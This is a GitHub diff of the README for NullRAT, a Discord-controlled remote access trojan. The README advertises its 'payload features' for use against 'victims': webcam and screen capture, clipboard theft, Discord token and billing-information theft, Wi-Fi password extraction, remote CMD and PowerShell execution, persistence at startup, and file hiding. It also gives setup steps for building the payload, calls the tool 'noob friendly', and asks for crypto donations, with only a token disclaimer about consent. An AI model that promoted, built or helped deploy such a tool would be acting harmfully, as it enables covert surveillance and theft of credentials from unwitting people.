|
6 | 6 |
|
7 | 7 | --- |
8 | 8 |
|
9 | | -<strong>TOTAL SYSTEM REWRITE IN PROGRESS, SORRY FOR NO NEW RELEASES. NULLRAT V9 SOON</strong> |
10 | 9 |
|
11 | 10 | </br> |
12 | 11 |
|
13 | 12 |
|
14 | | - |
15 | 13 | > # Features: |
16 | 14 | <h3 align=center>NullRAT Features</h3> |
17 | 15 |
|
|
21 | 19 | + Designed to be very noob friendly with intuitive features: |
22 | 20 | +- Controlled via slash commands |
23 | 21 | +- User friendly interface |
24 | | - +- Using modern Discord API Features |
| 22 | + +- Uses pagination and embed buttons, along with other neat features |
25 | 23 |
|
26 | | -+ Supports targeting multiple victims using IP Address |
| 24 | ++ Supports targeting multiple victims regardless of who they are |
27 | 25 |
|
28 | | -+ Created with small size and anonymity in mind! (7MB payload) |
| 26 | ++ Created with small size and anonymity in mind! (6.70MB payload) |
29 | 27 | ``` |
30 | 28 |
|
31 | 29 | <h3 align=center>NullRAT Payload Features</h3> |
32 | 30 |
|
33 | 31 | ```diff |
34 | 32 | === A full list of commands can be found by typing `/` === |
35 | 33 |
|
36 | | -+ Find the public IP Address of the victim [/getip] |
37 | | - |
| 34 | ++ Find all present victims at real time [/listvictims] |
| 35 | ++ Kill any running task that isn't Admin [/kill_runningtasks] |
| 36 | ++ Take pictures using victim's webcam [/get_webcam] |
| 37 | ++ Take screenshot of victim's monitor [/get_screenshot] |
| 38 | ++ Get victim's system information [/get_systeminfo] |
| 39 | ++ Get victim's clipboard text history [/get_clipboard] |
| 40 | ++ Send files/payloads to victim's PC [/sendfiles] |
| 41 | ++ Receive files from victim's PC [/receivefiles] |
| 42 | ++ Run any sent payloads quickly [/runfile] |
| 43 | ++ Find any environment variables [/get_environment] |
| 44 | ++ Add executable to startup with one command [/startup] |
| 45 | ++ Decrypt the new encrypted Discord Tokens and upload them [/discord_tokens] |
| 46 | ++ Check the decrypted Discord Tokens and upload all user info [/discord_checked] |
38 | 47 | + Directly upload Discord Tokens from 10+ application paths [/raw_tokens] |
39 | | - |
40 | | -+ Check the user tokens and upload all user info: [/checked_tokens] |
| 48 | + |
| 49 | ++ Find WIFI SSIDs [/wifilist] and passwords [/wifipass] in victim's PC |
| 50 | ++ Hide files [/hidefile] or unhide files [/unhidefile] in victim's PC |
| 51 | ++ Shutdown the RAT elegantly using the modern [/shutdown] commands |
| 52 | ++ Execute CMD commands & Powershell commands [/cmd] [/powershell] |
| 53 | + |
| 54 | ++ Check the user tokens and upload all user info: [/checked_tokens] |
41 | 55 | - Username, Tag and ID |
42 | 56 | - Email Address |
43 | 57 | - Phone Number |
44 | 58 | - Nitro Status |
45 | | - |
46 | | -+ [NEW!] Decrypt the new encrypted Discord Tokens and upload them [/discord_tokens] |
47 | | - |
48 | | -+ [NEW!] Check the decrypted Discord Tokens [/discord_checked] |
49 | | - |
50 | | -+ Find victim's geographic information: [/geolocate] |
| 59 | + - Billing Info Status |
| 60 | + |
| 61 | ++ Find victim's geographic information [/get_geolocation] |
51 | 62 | - Country |
52 | 63 | - City |
53 | 64 | - Region |
54 | | - - Latitude & longitude |
55 | 65 | - Zip Code |
56 | 66 | - ISP |
57 | | - |
58 | | -+ Take pictures using victim's webcam [/webcam_image] |
59 | | - |
60 | | -+ Take screenshot of victim's monitor [/screenshot] |
61 | | - |
62 | | -+ Send files/payloads to victim's PC [/sendfiles] |
63 | | - |
64 | | -+ Receive files from victim's PCs [/receivefiles] |
| 67 | + - Google Maps Link |
| 68 | + |
| 69 | ++ Directory manipulation commands: |
| 70 | + - [/get_currentdir] |
| 71 | + - [/set_currentdir] |
| 72 | + - [/list_directory] |
| 73 | + |
| 74 | ++ List any form of running tasks in victim's PC: |
| 75 | + - [/list_runningtasks] |
| 76 | + - [/list_runningstore] |
65 | 77 |
|
66 | | -+ Get victim's system information [/systeminfo] |
67 | | - |
68 | | -+ Execute CMD/Powershell command [/shell] |
69 | | - |
70 | | -+ Find any environment variables [/get_environment] |
71 | | - |
72 | | -+ See dir contents, change dir & do other dir manipulation |
73 | | - |
74 | | -+ Get victim's clipboard text history [/clipboard] |
75 | | - |
76 | | -+ Add executable to startup with one command [/startup] |
77 | | - |
78 | | -+ [WIP!] Find their billing information |
79 | | - |
80 | | -+ Find their wifi names [/wifilist] and passwords [/wifipass] |
81 | | - |
82 | | -+ Hide [/hidefile] or unhide files [/unhidefile] in their computer |
83 | | - |
84 | 78 | + ...and much more! |
85 | 79 | ``` |
86 | 80 |
|
|
99 | 93 | #### Preparation: |
100 | 94 | - Create a Discord Bot and [get it's token](https://github.com/NullCode1337/NullRAT/blob/source/Getting%20Variables.md#discord-bot-token) |
101 | 95 | - [Create a bot invite link with the correct scopes](https://github.com/NullCode1337/NullRAT/blob/source/Getting%20Variables.md#proper-bot-invite-link) and add it to your server |
102 | | -- Optionally, store the [Notification ID](https://github.com/NullCode1337/NullRAT/blob/source/Getting%20Variables.md#channel-id) and [Server ID](https://github.com/NullCode1337/NullRAT/blob/source/Getting%20Variables.md#server-ids) along with the token for easy access |
| 96 | +- Store the [Notification ID](https://github.com/NullCode1337/NullRAT/blob/source/Getting%20Variables.md#channel-id) and [Server ID](https://github.com/NullCode1337/NullRAT/blob/source/Getting%20Variables.md#server-ids) along with the token for ease of access |
103 | 97 |
|
104 | 98 | #### Steps: |
105 | | -1. Dowload the latest release of NullRAT (git cloning/download zip will no longer work) |
| 99 | +1. Dowload the latest release of NullRAT (recommended) [**git clone** and **download zip** is supported, but will be unstable] |
106 | 100 | 2. Run the AIO File and follow the prompts. NullRAT payload will be right there! |
107 | 101 |
|
108 | | -- **Video tutorial:** [https://youtu.be/G8CsgWYiwWI](https://youtu.be/G8CsgWYiwWI) |
| 102 | +- **Video tutorial:** Soon |
109 | 103 | - **NullRAT Discord:** [https://discord.com/invite/s9QANySc2q](https://discord.com/invite/s9QANySc2q) |
110 | 104 |
|
111 | 105 |
|
112 | 106 | </br> |
113 | 107 |
|
114 | 108 |
|
115 | 109 | > # Donate: |
116 | | -<h6 align=center>( <b>Even if you can't donate, it would be great if you starred this project</b> )</br></br> |
117 | | -( <b>It just gives me more motivation to work on it and improve it</b> )</h6> |
| 110 | +
|
| 111 | +**Donations keep me running and motivated. |
| 112 | +I thank you in advance for your generous support** |
118 | 113 |
|
119 | 114 | <details> |
120 | | -<summary>XMR Address</summary> |
| 115 | +<summary>Monero XMR</summary> |
121 | 116 |
|
122 | 117 | </br>48ehSGucnMHFir7YYT9eDfDrXZcrRx9PEeFL52tyDRTz3ZYSbQpnzoaXW484TzvEHkDucLiGGa7nAgcVy7gZSbsuHqgL3Er |
123 | 118 | </details> |
124 | 119 |
|
| 120 | +<details> |
| 121 | +<summary>BTC [BIP49] (SegWit)</summary> |
| 122 | + |
| 123 | +</br>37fyekYxe6EaNYZyhkcNYi6djfbTTQndHc |
125 | 124 |
|
126 | | -</br> |
| 125 | + |
127 | 126 |
|
| 127 | +</details> |
| 128 | + |
| 129 | +<details> |
| 130 | +<summary>LTC [BIP49] (SegWit)</summary> |
| 131 | + |
| 132 | +</br>MKxiQRMYcCPMmsBHEWr5fVsFo669k4hw6U |
| 133 | + |
| 134 | + |
| 135 | + |
| 136 | +</details> |
| 137 | + |
| 138 | +<details> |
| 139 | +<summary>ETH (erc20)</summary> |
| 140 | + |
| 141 | +</br>0xbC9B3F1b7B687eA193f6f85c7AEF669597F3db02 |
| 142 | + |
| 143 | + |
| 144 | + |
| 145 | +</details> |
| 146 | + |
| 147 | +<details> |
| 148 | +<summary>USDC [preferred] (erc20)</summary> |
| 149 | + |
| 150 | +</br>0xbC9B3F1b7B687eA193f6f85c7AEF669597F3db02 |
| 151 | + |
| 152 | + |
| 153 | + |
| 154 | +</details> |
| 155 | + |
| 156 | +<details> |
| 157 | +<summary>MATIC (Polygon)</summary> |
| 158 | + |
| 159 | +</br>0xbC9B3F1b7B687eA193f6f85c7AEF669597F3db02 |
| 160 | + |
| 161 | + |
| 162 | + |
| 163 | +</details> |
| 164 | + |
| 165 | + |
| 166 | +</br> |
128 | 167 |
|
129 | | -> # Credits: |
130 | | -1) Sp00p64 |
131 | | -2) Buntii |
132 | | -3) usrDottik |
133 | 168 |
|
134 | 169 | **Infecting others via NullRAT without their permission is obviously not supported by me.** |
135 | 170 | <h4 align=right>Software designed by NullCode</h6> |
0 commit comments